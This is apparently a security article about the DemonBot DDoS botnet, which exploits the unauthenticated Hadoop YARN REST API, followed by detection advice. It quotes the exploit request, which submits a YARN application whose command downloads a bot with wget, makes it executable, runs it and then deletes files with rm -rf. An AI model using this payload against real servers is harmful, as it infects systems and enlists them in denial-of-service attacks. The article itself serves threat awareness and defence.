DemonBot is the program that is supposed to be running on infected servers and will connect into the command and control server and listens for new commands.

DemonBot is a new attack carried by botnets for Denial of Services or Distributed Denial of Services. Since one-month DemonBot is on rising slowly in shadows. DemonBot targeted unsecured Apache Hadoop servers by compromising them using publicly available exploits and implementing their bots in vulnerable servers.

DemonBot spreads only via central servers and does not expose worm-like behavior exhibited by Mirai based bots. As of today, Radware is tracking over 70 active exploit servers that are actively spreading DemonBot and are exploiting servers at an aggregated rate of over 1 Million exploits per day.

The name DemonBot Botnet itself identify by a malicious agent that is exploiting Hadoop servers by YARN unauthenticated remote command execution. Radware Threat Research center find out that a malicious agent is exploiting Hadoop server’s vulnerability to infect cloud servers. They found a unique footprint in this agent codes.

DemonBot has grown up till 70 powerful servers and a threat alert has been sent out by Radware and IBM to inform the customers about this new threat named as DemonBot. Cybersecurity company Radware monitoring these activities and found a huge increase that is over one million daily exploit attempts.

Radware confirmed that DemonBot using YARN security flaw. That is basically related to the misconfiguration of YARN that exposes REST API to allow the remote application to add another application in the cluster.

Radware researcher referenced this botnet as Mirai Variant also known as Owari. They are pretty sure this is a new botnet named as DemonBot, because of its unique fingerprint in codes. Attack vector supported by DemonBot botnet attack is TCP and UDP Floods.

DemonBot Botnet

{“am-container-spec”: {“commands”: {“command”: “cd/tmp; wget; chmod 777 *; ./bash drone; rm -rf *”}}, “application-id”: “application_xxxxxxxxxx_xxxx”, “application-type”: “YARN”, “application-name”: “get-shell”}

 Detect and Investigate DemonBot

The Radware post provides some useful Indicators of Compromise (IOCs) for detecting DemonBot, but the unfortunate nature of static IOCs is that they’re brittle, with a short shelf life. The creator of DemonBot can probably tweak or obfuscate their code or make changes in their own infrastructure to render current IOCs ineffective. Furthermore, the existing IOCs might already be ineffective in situations where network traffic is sufficiently encrypted.

Fortunately, there’s a method of detecting DemonBot and other RCE exploits against the YARN REST API that is much more difficult for the threat actor to route around. It relies on the fairly safe, basic assumption that because Enterprise Hadoop handles valuable, internal data, there should be strong protections around who and what can access the data, and especially around which new applications can use YARN to tap data and resources in Hadoop.